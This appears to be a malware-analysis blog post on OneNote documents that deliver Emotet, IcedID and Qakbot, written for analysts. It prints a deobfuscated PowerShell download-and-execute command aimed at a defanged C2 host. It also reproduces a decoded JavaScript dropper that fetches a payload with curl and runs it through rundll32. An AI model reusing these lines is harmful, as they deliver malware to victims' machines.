OneNote Analysis
11 May 2023
By Jacob Pimental
OneNote documents are the latest trend for malware because they do not require macros to run the malware and very few tools can accurately parse the file format. This trend has been seen in the distribution of Qakbot and Redline Stealer. While malware-laced OneNote files may seem to benefit only criminals, the unique file format also offers a few benefits from a forensics perspective. This article walks through analyzing basic OneNote malware using the pyOneNote tool from DissectMalware.
Samples
MD5 | Name |
---|---|
b951629aedffbabc180ee80f9725f024 | info_9316876362.one |
eb8d50fd5a3afa04fe7fb476f2df9e99 | Inv_02_02_#2.one |
b915056524f1b25937074727cdf5f87c | file_5.hta |
c9d2355fc2be90b0fa73ecb67061a77e | file_1.hta |
- Samples
- OneNote Format
- Basic Analysis
- Advantages of the Transaction Log
- Conclusion
- IOCs
- Mitre ATT&CK IDs
OneNote Format
OneNote documents consist of sections, pages, outlines, and content, each having their own metadata and attributes. Details of the MS-ONE file format can be found in the specification documents from Microsoft. Below is a brief overview of the structure:
Structure of OneNote Document
Sections
Sections contain pages, metadata, and properties for the OneNote document. This is what gets exported as a .one file when saving from OneNote. It contains properties such as which pages are contained within the section, the order of those pages, and the name of the section.
Pages
Pages contain the actual content of the OneNote document. This includes text, images, tables, and outlines. Some of the properties associated with a page include the author, the width and height of the page, the last modified timestamp, and whether this is the first page in the section.
Outline
Outlines are a convenient way to group elements together. You can think of outlines like a mini container that stores text, images, tables, file references, etc. Outlines can be placed anywhere on a page and are even allowed to overlap with each other. Outlines have properties associated with their height, width, and their location on the page.
Content
Content is the actual text, images, tables, and data files that go into pages and outlines. Each content element has its own set of unique properties and values.
Properties and Property Sets
All content within a OneNote document contains a series of properties associated with the element. Property sets are the groups of properties that make up an element, and their names are often prefixed with jcid, a structure specific to OneNote documents. The property sets within a OneNote file describe the types of elements within that file and how to parse them. Properties are the individual metadata values contained within a property set.
Transaction Log
The transaction log is a special metadata object within a OneNote document that will keep track of changes. This allows the user to view previous versions of a document and see when they were edited. For an analyst, the transaction log can help find additional IOCs associated with a sample and identify previous campaigns the file might have been used in.
File Data Object
A file data object is a special element that contains a binary stream for the type of file it represents. This can be used maliciously by including malicious scripts or executables that can run when a user double-clicks on them. When a file data object is added to a OneNote document, it displays as the .ico of the application that will run the file as shown in the screenshot below:
File data object of .hta file
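To make the idea of a file data object more concrete, here is a minimal sketch of carving embedded payloads straight out of the raw bytes. It assumes the FileDataStoreObject layout from the MS-ONESTORE specification (a 16-byte header GUID, an 8-byte length, 12 bytes of unused and reserved fields, then the file data). The function name `carve_file_data_objects` is my own and is not part of pyOneNote, and a byte-level scan like this is only a rough approximation of proper parsing.

```python
import struct
import uuid

# Header GUID of a FileDataStoreObject per MS-ONESTORE; GUIDs are stored
# little-endian on disk, hence bytes_le.
FDSO_HEADER = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le


def carve_file_data_objects(blob: bytes) -> list[bytes]:
    """Return the payload of every FileDataStoreObject found in blob."""
    payloads = []
    pos = blob.find(FDSO_HEADER)
    while pos != -1:
        length_off = pos + 16          # cbLength follows the header GUID
        if length_off + 8 > len(blob):
            break                      # truncated object, stop scanning
        (cb_length,) = struct.unpack_from("<Q", blob, length_off)
        data_off = pos + 36            # skip cbLength (8) + unused (4) + reserved (8)
        data = blob[data_off:data_off + cb_length]
        if len(data) == cb_length:     # ignore objects that run past the end
            payloads.append(data)
        pos = blob.find(FDSO_HEADER, pos + 16)
    return payloads
```

Calling `carve_file_data_objects(open(path, "rb").read())` on a sample would return one byte string per embedded file, which can then be hashed or written to disk for further analysis.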
Basic Analysis
Taking a look at info_9316876362.one, we can verify with trid that this is a OneNote document:
trid identifying the file as a .one document
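If trid is not available, the same check can be approximated by hand. The sketch below assumes the file-type GUID that MS-ONESTORE defines for .one section files, which occupies the first 16 bytes of the file. The helper name `is_onenote_section` is hypothetical.

```python
import uuid

# guidFileType value for .one section files, per the MS-ONESTORE header definition.
ONE_FILE_TYPE = uuid.UUID("{7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}")


def is_onenote_section(header: bytes) -> bool:
    """Check whether the first 16 bytes of a file match the .one file-type GUID."""
    if len(header) < 16:
        return False
    # GUIDs are stored little-endian on disk, so decode with bytes_le.
    return uuid.UUID(bytes_le=header[:16]) == ONE_FILE_TYPE
```

In practice this would be called as `is_onenote_section(open("info_9316876362.one", "rb").read(16))`. It only confirms the magic value and says nothing about whether the rest of the file is well-formed.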
Because there is no OLE data like in normal Office documents, we cannot use oletools to parse this file. This is where pyOneNote comes in. pyOneNote will parse the contents of the transaction log and list the changes made in the document. The tool will also extract any embedded files and write them to the directory specified by the -o flag. For example, in the screenshot below pyOneNote is being used to extract embedded files to the “extracted_files” directory.
Running pyOneNote on document
The output makes it clear that several files were pulled from the OneNote document. Three of these files are PNGs that look like they are used to trick a user into clicking a link. The fourth file is JavaScript whose original file path was C:\Autoruns\output1.js. The metadata from the script tells us that the language of the script is set to Russian, and that the alt text for the image NOTE4_WHITE_1.bmp is Russian text that translates to:
Auto-generated alt text:
Connect to the cloud
This document contains attachments from the cloud
to receive them, double click "Next"
Next
Embedded JavaScript file information showing the Russian Language ID and name of file
Information about the embedded image including the alt text and name of image file
Image embedded in OneNote Document
Looking at the list of properties found by pyOneNote, we can see a jcidEmbeddedFileNode that matches the output1.js file. This tells us that the author embedded the script in the document so that when a user clicks on it, Windows will open the script in the appropriate application, wscript in this case. Thanks to the transaction log, we can see the date the script was embedded: 2023-03-17 13:37:19.
jcidEmbeddedFileNode property showing the date value
Analyzing Malicious Script
Now that we know there is an embedded script and have extracted it with pyOneNote, we can begin our analysis. To do this quickly, I am going to use a slightly modified version of box-js, a JavaScript emulator that comes with REMnux. I can launch the malicious script in the emulator using the command:
box-js extracted_files/file_3.js --download
We can see that the script attempts to reach out to multiple C2s and write what looks to be a zip file. It will then extract that file to a new folder and run the unzipped file via regsvr32.exe.
box-js analysis results
This shows the power of emulation over having to manually analyze the file. Upon further analysis, the downloaded payload is Emotet, but that is outside the scope of this article.
Advantages of the Transaction Log
The transaction log is extremely useful when analyzing OneNote documents. It allows us to view the changes the document went through and can help us find additional IOCs associated with the sample. For example, when running Inv_02_02_#2.one through pyOneNote you will notice that it extracts two .hta files. It’s initially unclear which one of these files will execute when the user opens the file, but with the help of the transaction log we can see if there were any changes made to these .hta files.
Using the following gawk command on the output of pyOneNote, I was able to pull out only the jcidEmbeddedFileNode properties and their corresponding .hta file.
gawk -v n=8 '{ if( match($0, /\s+(jcid[^\(]+)\(/, arr) ) { if( arr[1]~/jcidEmbeddedFileNode/ ) { print arr[1]; for( i=1; i<=n; i++ ) getline; print; } } }' output.txt
List of embedded filenames in the .one document
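For readers who would rather stay in Python, the gawk one-liner can be approximated as below. This is a sketch that mirrors the same logic: match a property-set name, keep only jcidEmbeddedFileNode entries, then take the line a fixed number of lines later. The offset of 8 comes from the gawk command above. The function name is hypothetical, and the offset may need adjusting if pyOneNote's output layout differs between versions.

```python
import re

# Same pattern as the gawk command: leading whitespace, a jcid name, then "(".
NODE_RE = re.compile(r"\s+(jcid[^(]+)\(")


def embedded_file_lines(lines, offset=8):
    """Return (property set name, line `offset` lines later) for each embedded file node."""
    results = []
    i = 0
    while i < len(lines):
        match = NODE_RE.search(lines[i])
        if match and "jcidEmbeddedFileNode" in match.group(1):
            # Clamp to the last line, like gawk's getline does at end of input.
            target = min(i + offset, len(lines) - 1)
            results.append((match.group(1), lines[target]))
            i = target + 1  # getline consumed these lines, so skip past them
        else:
            i += 1
    return results
```

It can be run over the saved tool output with `embedded_file_lines(open("output.txt").read().splitlines())`.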
Based on the output in the screenshot above, we can see that there was a change in the embedded files from Z:\build\one\Open.hta to C:\Users\Admin\Desktop\Open.hta on February 3rd, 2023. We can infer that the latest version of the .hta file is the expected payload for the sample and can continue our analysis from there.
File_5.hta Analysis
The latest version of the .hta file was extracted by pyOneNote as file_5.hta. This file contains VBScript code that will loop through each index of an array of decimal values and subtract that value from the char value of a large blob of text. The output of this is then run through the execute function of VBScript if the folder c:usersta does not exist. One thing to note is that c:usersta is not a valid folder name. The author of the script most likely used that name so that the malware will always run.
First round of obfuscation in file_5.hta
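The subtraction routine described above is simple to reproduce outside of VBScript. The sketch below is my own reconstruction of the idea, not the sample's code: it assumes the array of decimal values is reused cyclically across the blob, which may not match the sample exactly, and the names `decode_blob` and `offsets` are hypothetical.

```python
def decode_blob(blob: str, offsets: list[int]) -> str:
    """Subtract a per-position offset from each character code of blob."""
    # Assumption: the offsets array wraps around when the blob is longer than it.
    return "".join(
        chr(ord(ch) - offsets[i % len(offsets)])
        for i, ch in enumerate(blob)
    )
```

Decoding this way, rather than letting the script call execute, keeps the second stage as inert text that can be read safely.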
The decoded output runs an encoded PowerShell command that deobfuscates to:
IEX (New-Object Net.Webclient).downloadstring("http://corsanave[.]top/gatef.php")
This will download and run the content hosted at http://corsanave[.]top/gatef.php, which at the time of writing is down but was associated with IcedID according to this report from Joe Sandbox.
Encoded PowerShell run by file_5.hta
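Encoded PowerShell commands are commonly passed through the -EncodedCommand parameter, which expects Base64 over UTF-16LE text. Assuming this sample follows that convention (the exact encoding is only visible in the screenshot), a minimal decoder looks like this. The function name is hypothetical.

```python
import base64


def decode_powershell(encoded: str) -> str:
    """Decode a Base64 string in the format used by PowerShell's -EncodedCommand."""
    # PowerShell encodes the command as UTF-16LE before applying Base64.
    return base64.b64decode(encoded).decode("utf-16-le")
```

If the decoded text still looks scrambled, the sample likely adds further layers on top, which would need to be unwound separately.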
File_1.hta
After analyzing file_5.hta, we should analyze the previous version of the .hta file to fully understand the threat and identify additional IOCs. The previous version of the file was extracted by pyOneNote as file_1.hta. In it, we can see an entirely different version of the .hta file we looked at previously. This version is written in JavaScript as opposed to VBScript and uses a different method of obfuscation.
When first looking at the file we notice a div section defined containing an obfuscated string. We then see the content of this div being written to the registry key HKCU\SOFTWARE\Andromedia\Mp4ToAvi\Values.
Creating div and writing content to registry key
Next, the JavaScript will take the value from that registry key, remove all occurrences of 5& and use the decoded value to create a function. Using CyberChef, we can see that this function will take a URL as an argument. It will then download a file from that URL using curl.exe and output it into C:\ProgramData\index1.png. Finally, the function will execute the downloaded file using rundll32.exe with the function Wind. The decoded JavaScript function is below:
function sleep(millis) {
    var date = new Date();
    var curDate = null;
    do {
        curDate = new Date();
    } while (curDate - date < millis);
}
/** var url = "https://google.com"; */
new ActiveXObject("wscript.shell").run("curl.exe --output C:\\ProgramData\\index1.png --url " + url, 0);
sleep(15000);
var shell = new ActiveXObject("shell.application");
shell.shellexecute("rundll32", "C:\\ProgramData\\index1.png,Wind", "", "open", 3);
In the above snippet, we see that a comment was left in for testing the function with the URL “google.com”.
After the Wind function is created, it is run with the hard-coded parameter https://unitedmedicalspecialties[.]com/T1Gpp/OI.png. At the time of writing, this C2 is down but is associated with Qakbot according to this report by eSentire.
Finally, the .hta file will delete the registry key it created using VBScript.
Creation of new function and grabbing payload
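The deobfuscation used by file_1.hta, removing every occurrence of 5& from the stored string, can be reproduced without CyberChef. This is a minimal sketch with a made-up input string, and the helper name `strip_marker` is hypothetical.

```python
def strip_marker(obfuscated: str, marker: str = "5&") -> str:
    """Remove every occurrence of the junk marker from the obfuscated string."""
    return obfuscated.replace(marker, "")
```

Applied to the string copied out of the div, this should yield the JavaScript source that the sample turns into a function.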
Conclusion
Thanks to tools like pyOneNote, OneNote documents can be analyzed without having the OneNote application installed on your machine. This is useful for those without a Microsoft 365 subscription or without access to a Windows machine. We also used the transaction log associated with OneNote documents to extract a previous version of the payload that was associated with a different campaign entirely! This leads us to believe that whoever wrote the IcedID payload might have used a copy of the Qakbot payload as a template.
Thanks for reading and happy reversing!
IOCs
Network Indicators
IOC |
---|
Sample 1 |
https://oopt[.]center:443/bitrix/HKD1OCEK4mWEc0/ |
http://aristonbentre[.]com/slideshow/O1uPzXd2YscA/ |
https://applink[.]gr/wp-admin/pWxO42PQrVL0ja5LTfhy/ |
http://attatory[.]com/i-bmail/6AfEa8G0W8NOtUh7hqFj/ |
http://asakitreks[.]com/uploads/ce8u7/ |
https://www[.]ata-sistemi[.]si/wp-admin/cVDQapxmtAQQq1gr3/ |
http://bvdkhuyentanyen[.]vn/files/TKK8yKdEvyYAbBE5avb/ |
http://bluegdps100[.]7m[.]pl/app/Ac8wwulKxqZjc/ |
https://casapollux[.]com/Bilder/GDo3zoURY/ |
Sample 2 |
http://corsanave[.]top/gatef.php |
https://unitedmedicalspecialties[.]com/T1Gpp/OI.png |
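The indicators above are defanged with [.] so they cannot be clicked by accident. When loading them into a blocklist or search tool, a small helper can restore them and pull out the hostname. The sketch below assumes [.] is the only defanging convention in use, as it is in this table, and both function names are hypothetical.

```python
from urllib.parse import urlsplit


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as example[.]com back into example.com."""
    return ioc.replace("[.]", ".")


def ioc_host(ioc: str):
    """Return the hostname of a defanged URL, without the port or path."""
    return urlsplit(refang(ioc.strip())).hostname
```

Refanged values are best kept inside analysis tooling and out of anything that renders them as live links.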
Mitre ATT&CK IDs
ID | Name |
---|---|
T1071.001 | Application Layer Protocol: Web Protocols |
T1218.010 | System Binary Proxy Execution: Regsvr32 |
T1105 | Ingress Tool Transfer |
T1059.001 | Command and Scripting Interpreter: PowerShell |
T1204.002 | User Execution: Malicious File |
T1112 | Modify Registry |
T1218.011 | System Binary Proxy Execution: Rundll32 |